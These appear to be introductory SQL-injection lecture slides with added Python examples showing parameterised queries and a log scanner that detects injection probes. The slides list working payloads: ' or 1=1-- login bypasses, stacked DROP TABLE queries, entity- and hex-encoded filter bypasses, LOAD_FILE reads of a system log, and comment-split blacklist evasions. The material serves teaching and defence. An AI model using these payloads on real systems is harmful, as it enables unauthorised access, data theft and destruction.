sql – injections intro. prajen bhadel college of information technology & engeneering...
SQL – Injections Intro.
Prajen Bhadel
College of Information Technology & Engineering
Kathmandu, Tinkune
Sixth semester
SQL Injections
• SQL injection – code injection technique that exploits a security vulnerability in an application
  – occurs at the database layer of an application
• SQL – Structured Query Language
  – used to communicate with the database
  – ANSI-compliant SQL
SQL Injections
• Authentication Bypass
• Information Disclosure
• Compromised Data Integrity
• Compromised Availability of Data
• Remote Command Execution
Basic SQL
Select
Insert
Update
Delete
Union
• SQL statement breakdown
SQL - Select
1. Select Information from a table
SELECT * FROM table where field=1
SQL - Insert
1. Add new records to the database
INSERT INTO tablename (id, name) VALUES (10, 'Greg')
SQL - Update
1. Updating existing records
UPDATE table set fieldA=123 WHERE somefield=2323
UPDATE table set fieldB='Greg'
SQL - Delete
1. Delete records
DELETE FROM tableA where somefield=1221
DELETE FROM tableA
SQL - Union
1. Combine two or more SELECT statements.
SELECT column_name(s) FROM table_name1
UNION
SELECT column_name(s) FROM table_name2
Terminators
• ; Semicolon ends the current SQL query and starts a new one
  – SELECT * FROM users ; DROP TABLE users
  – Stacked Query
• -- Double dash ignores the remaining query string
  – SELECT * FROM users -- limit 10
• Can be used in conjunction
  – SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''
Where Clause Pruning
• Powerful SQL technique
  – SQL trick for allowing a single query to return either the full set or a specified subset
  – 1=1 == TRUE
• SELECT * FROM users
  WHERE (id = :id) OR (-1 = :id)
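Added example, not from the slides: the pruning query above run through Python's sqlite3 with :id bound as a parameter. It shows the legitimate -1 sentinel returning the full set, while a string carrying the 1=1 trick stays a plain value. The users table and its rows are constructed for the demo.

```python
import sqlite3

# Constructed sample rows for the demo (not from the slides).
USERS = [(1, "alice"), (2, "bob"), (3, "carol")]

# The slide's pruning query: -1 is a sentinel value that switches the
# WHERE clause off, so one prepared statement serves "one row" and "all rows".
PRUNING_QUERY = "SELECT id, name FROM users WHERE (id = :id) OR (-1 = :id)"


def make_db():
    """In-memory SQLite database holding the constructed users rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (id, name) VALUES (?, ?)", USERS)
    return conn


def find_users(conn, requested_id):
    """Run the pruning query with :id bound as a parameter, never concatenated.

    A bound value is compared as data: an integer matches by value, while a
    string such as "1 OR 1=1" is just a string that equals no id, so the
    1=1 trick from the slide cannot turn the subset into the full set.
    """
    return conn.execute(PRUNING_QUERY, {"id": requested_id}).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(find_users(conn, 2))           # the subset: [(2, 'bob')]
    print(find_users(conn, -1))          # the full set via the -1 sentinel
    print(find_users(conn, "1 OR 1=1"))  # [] - compared as a string, never parsed as SQL
```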
SQL Injection Cause
• Executed via the front end of the Web Application
  – GET URL parameter
    • http://host.com/item.php?cat=1&id=11
  – Form POST fields
    • <form action="some.php" method="post"> <input name='name'/> <input type='password' name='passwd'/></form>
Techniques
• Normal SQL Injections
  – Errors & Exceptions
  – Unexpected output
    • O'Reilly != O\'Reilly
• Blind SQL Injections
  – No errors
  – A lot of guesswork
  – Introduction of a delay as part of a malicious SQL statement
SQL Injection Types
• Passive – Exposing database information
  – Information retrieval
• Active – Altering database information
  – Insertion
  – Deletion
Testing for Vulnerability
• Manual
  – Time consuming
• Automated
  – SQL injection scanners only scan for known vulnerabilities
• Google
  – Incorrect syntax near
Toolbox
• SQLIer
• SQLbftools
• SQLibf
• SQLBrute
• BobCat
• SQLMap
• Absinthe
• SQL Injection Pen-testing Tool
• SQID
• SQLNinja
• FJ-Injector Framework
• Automagic SQL Injector
• NGSS SQL Injector
Identifying Vulnerable Site
• Given unexpected input, the site behaves oddly
  – ' Single quote
  – " Double quote
  – '1 Single quote, one
  – 'a Single quote, a
  – '; Single quote, semicolon
• Input > Satan's little minion
  – Nothing found for Satan\'s little minion
  – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'
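Added example, not from the slides, covering this slide and the "Testing for Vulnerability" one: a small log scanner a defender can run over application logs to flag requests that carry the quote probes listed above and responses that echo a raw database error (the MySQL message quoted here and the "Incorrect syntax near" string). The log format and the log lines are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Raw database error strings that should never reach a client. The two
# entries are the messages quoted on the slides (MySQL and MSSQL).
DB_ERROR_PATTERNS = [
    re.compile(r"You have an error in your SQL syntax", re.I),
    re.compile(r"Incorrect syntax near", re.I),
]

# The probe inputs on the slide all start with a quote character, so a quote
# anywhere in the decoded query string is what we look for.
PROBE_PATTERN = re.compile(r"['\"]")

# Constructed log lines in the form "<method> <path?query> <status> <message>".
SAMPLE_LOG = [
    "GET /search.php?q=minion 200 Found 3 results",
    "GET /search.php?q=Satan%27s+little+minion 500 You have an error in your SQL syntax; "
    "check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'",
    "GET /item.php?cat=1&id=11 200 ok",
    "POST /login.php 200 Nothing found for Satan\\'s little minion",
]


def scan_log_line(line):
    """Return findings for one line: 'probe' when the decoded query string
    carries a quote, 'error_leak' when the response echoes a raw DB error."""
    findings = []
    method, path, status, message = line.split(" ", 3)
    query = path.partition("?")[2]            # text after '?', '' if none
    if PROBE_PATTERN.search(unquote_plus(query)):
        findings.append("probe")
    if any(p.search(message) for p in DB_ERROR_PATTERNS):
        findings.append("error_leak")
    return findings


def scan_log(lines):
    """Map line number -> findings for every line that triggered something."""
    report = {}
    for lineno, line in enumerate(lines):
        findings = scan_log_line(line)
        if findings:
            report[lineno] = findings
    return report


if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))  # {1: ['probe', 'error_leak']}
```

The fourth line is the escaped case from the slide (the quote reached the database as data and the application answered normally), so it raises no finding; a probe that produces an error leak is the pair worth alerting on.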
Identifying Vulnerable Site
• ' or 1=1--
• " or 1=1--
• or 1=1--
• ' or 'a'='a
• " or "a"="a
• ') or ('a'='a
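Added example, not from the slides: the login form from the "SQL Injection Cause" slide checked two ways in Python's sqlite3, with the first probe string on this slide as input. The concatenating version is the defect, the parameterised version is the fix; the users table and the one account are constructed for the demo.

```python
import sqlite3

# Constructed account for the demo (not from the slides); the password is
# stored in clear only to keep the example short.
ACCOUNTS = [("greg", "s3cret")]


def make_db():
    """In-memory SQLite database with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO users (name, passwd) VALUES (?, ?)", ACCOUNTS)
    return conn


def login_unsafe(conn, name, passwd):
    """The defect: the form fields are pasted straight into the SQL string.

    With name = "' or 1=1--" the statement becomes
      SELECT name FROM users WHERE name='' or 1=1--' AND passwd='...'
    The -- terminator drops the password check and 1=1 matches every row.
    """
    sql = ("SELECT name FROM users WHERE name='" + name
           + "' AND passwd='" + passwd + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, name, passwd):
    """The fix: the same query with bound parameters, so input stays data."""
    sql = "SELECT name FROM users WHERE name=? AND passwd=?"
    return conn.execute(sql, (name, passwd)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    probe = "' or 1=1--"
    print(login_unsafe(conn, "greg", "s3cret"), login_safe(conn, "greg", "s3cret"))  # True True
    print(login_unsafe(conn, probe, "x"), login_safe(conn, probe, "x"))              # True False
```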
Bypassing Filters
• Escaping entities
  – %26%23039 == &#039; == ' (single quote)
    • %26 == &
    • %23 == #
    • 039 Entity number
  – SELECT * FROM users WHERE username='secret%26%23039 OR %26%23039X%26%23039=%26%23039X
  – Evaluated as > SELECT * FROM users WHERE username='secret ' OR 'X' = 'X'
    • This evaluates to always true
• Char function
  – Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)
  – Select * from users
• Concat & Hex functions
  – CONCAT('0x', HEX('/var/log/messages'))
  – 0x2F7661722F6C6F672F6D65737361676573
Bypassing Filters
• Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') )
  – MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)
Bypassing Filters
• 1=(SELECT LOAD_FILE('var/log/messages') )
  – MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1)
• Char
• Hex
  – 1=(SELECT LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573))
Bypassing Blacklists
• What are Blacklists
• Blacklist (DELETE, EXEC)
  – DEL/**/ETE
  – /**/ D/**EVIL**/ELE/**/TE
Escape Characters
• %26%23039 OR %26%23039X%26%23039=%26%23039X
  – ' OR 'X' = 'X'